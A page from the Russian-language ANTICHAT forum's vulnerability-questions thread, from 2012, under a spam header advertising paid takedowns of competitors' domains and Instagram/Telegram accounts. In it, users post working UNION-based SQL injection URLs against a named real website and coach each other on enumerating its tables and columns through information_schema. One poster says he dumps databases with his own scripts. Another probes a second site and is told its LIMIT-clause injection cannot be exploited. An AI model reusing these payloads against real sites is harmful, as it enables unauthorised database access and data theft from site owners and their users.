УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 2019 из 2438

2019

Опции темы

Поиск в этой теме

Опции просмотра

#20181

25.03.2012, 00:53

Melfis

Guest

Сообщений: n/a

Провел на форуме:
195266

Репутация: 53

http://kinoad.ru/robots/prosmotr/index.php?id=1908%27+limit+0,0+union+select+1,2,3, 4,5,6,7,8,9,10,11,column_name,13,14,15,16,17,18,19 ,20,21+from+information_schema.columns+where+limit+0,1--+

Читая твои вопросы, в 70% у тебя проблема в себе самом и в том, что ты не пытаешься сам решить проблему. Если хочешь чему-то научиться, сначала пробуй разобраться.

#20182

25.03.2012, 00:53

Tigger

Познавший АНТИЧАТ

Регистрация: 27.08.2007

Сообщений: 1,107

Провел на форуме:
5386281

Репутация: 1177

Отправить сообщение для Tigger с помощью ICQ

Цитата:

Сообщение от qaz

qaz said:
точняк, в опере норм открывает, единственная трабла, я сливаю базы через свои php скрипты, и они также как и фф нехотят выодить как нужно, мб есть какое решение?
и сразу ещо вопрос, таблицы выводит нормально, колонки нехочет
http://kinoad.ru/robots/prosmotr/index.php?id=1908%27+limit+0,0+union+select+1,2,3, 4,5,6,7,8,9,10,11,column_name,13,14,15,16,17,18,19 ,20,21+from+information_schema.columns+where+limit +0,1--+
как их вывести?

Все выводиться, WHERE убери =\

#20183

25.03.2012, 00:54

winstrool

Познающий

Регистрация: 06.03.2007

Сообщений: 59

Провел на форуме:
371875

Репутация: 137

Цитата:

Сообщение от qaz

После 'where' надо добавить table_name=0x[хекс значение выводимой таблы]+limit+0,1+--+

#20184

25.03.2012, 03:12

Facecontrol

Guest

Сообщений: n/a

Провел на форуме:
13805

Репутация: 0

А на мой вопрос кто нибудь ответит?

#20185

25.03.2012, 03:16

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

Провел на форуме:
2101094

Репутация: 672

Отправить сообщение для Konqi с помощью ICQ

Цитата:

Сообщение от Facecontrol

Facecontrol said:
А на мой вопрос кто нибудь ответит?

для кого это тема?

там море ссылок

#20186

25.03.2012, 08:37

beBoss

Guest

Сообщений: n/a

Провел на форуме:
8271

Репутация: 0

http://site.com/about.php?page='

Цитата:

Сообщение от None

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20, 20' at line 1[SELECT namemap.info_hash as hash, namemap.filename, namemap.url, namemap.poster, namemap.data, categories.name as cname, namemap.category as catid FROM namemap LEFT JOIN categories ON categories.id = namemap.category WHERE namemap.status=1 ORDER BY data DESC LIMIT -20, 20]

Is that sql vuln ?

Well, for now I don't want to post link over the internet, but can you help me a little to find the tables ? I tried so many of ways but can't get working method...

My tries:

Код:

Code:
http://site.com/about.php?page=')+order+by+13--+-
http://site.com/about.php?page='+order+by+13--+-
http://site.com/about.php?page=' order by 13

But there is no change...

Any ideas ?

BTW I'm sorry about the language, but if I use google translate, would be awful for all of us...

#20187

25.03.2012, 08:38

Ereee

Guest

Сообщений: n/a

Провел на форуме:
102354

Репутация: 267

Yes, this is sql-injection, but in LIMIT. You can't exploit this vuln.

#20188

25.03.2012, 08:40

beBoss

Guest

Сообщений: n/a

Провел на форуме:
8271

Репутация: 0

Sad face

Thanks for the info

#20189

25.03.2012, 13:10

qaz

Guest

Сообщений: n/a

Провел на форуме:
344922

Репутация: 75

Цитата:

Сообщение от Tigger

Tigger said:
Все выводиться, WHERE убери =\

та то я нечаёно оставил, забыл вытереть прежде чем запостить

Цитата:

Сообщение от winstrool

winstrool said:
После 'where' надо добавить table_name=0x[хекс значение выводимой таблы]+limit+0,1+--+

да и так пробовал, вабще колонки выводить нехочет

#20190

25.03.2012, 13:56

winstrool

Познающий

Регистрация: 06.03.2007

Сообщений: 59

Провел на форуме:
371875

Репутация: 137

Цитата:

Сообщение от qaz

qaz said:
та то я нечаёно оставил, забыл вытереть прежде чем запостить
да и так пробовал, вабще колонки выводить нехочет

Не понимаю почему у вас не получается, вот вам вывод, взял из случайной таблици: INNODB_CMP_RESET где ее хекс значение равняется 494e4e4f44425f434d505f5245534554

_http://kinoad.ru/robots/prosmotr/index.php?id=1908%27+limit+0,0+union+select+1,2,3, 4,5,6,7,8,9,10,11,group_concat(column_name),13,14, 15,16,17,18,19,20,21+from+information_schema.colum ns+where+table_name=0x494e4e4f44425f434d505f524553 4554+limit+0,1--+

Страница 2019 из 2438

2019

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход